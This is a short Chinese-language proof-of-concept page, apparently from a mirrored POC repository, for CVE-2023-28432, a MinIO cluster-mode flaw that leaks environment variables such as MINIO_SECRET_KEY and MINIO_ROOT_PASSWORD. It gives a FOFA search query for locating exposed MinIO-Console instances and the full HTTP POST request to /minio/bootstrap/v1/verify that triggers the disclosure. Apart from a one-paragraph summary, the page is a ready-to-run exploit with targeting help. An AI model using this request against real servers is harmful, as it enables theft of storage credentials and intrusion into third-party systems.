mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-06 19:07:11 +00:00
33 lines
1.4 KiB
Markdown
33 lines
1.4 KiB
Markdown
|
# MinIO存在信息泄露漏洞(CVE-2023-28432)
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
MinIO是基于GNU Affero通用公共许可证v3.0发布的高性能对象存储。兼容Amazon S3云存储服务的API。使用MinIO为机器学习、分析和应用程序数据工作负载构建高性能基础设施。在集群模式中,MinIO的某些接口会因为信息处理不当而返回会返回所有环境变量,包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,导致敏感信息泄露。使用分布式部署的所有用户都会受到影响。
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
+ MinIO-Console
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ fofa`app="MinIO-Console"`
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
POST /minio/bootstrap/v1/verify HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept: */*
|
|||
|
|
Accept-Language: en-US;q=0.9,en;q=0.8
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
|
|||
|
|
Connection: close
|
|||
|
|
Cache-Control: max-age=0
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 0
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-09-05 23:24:41
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yrxgtl2ou0ils7bm>
|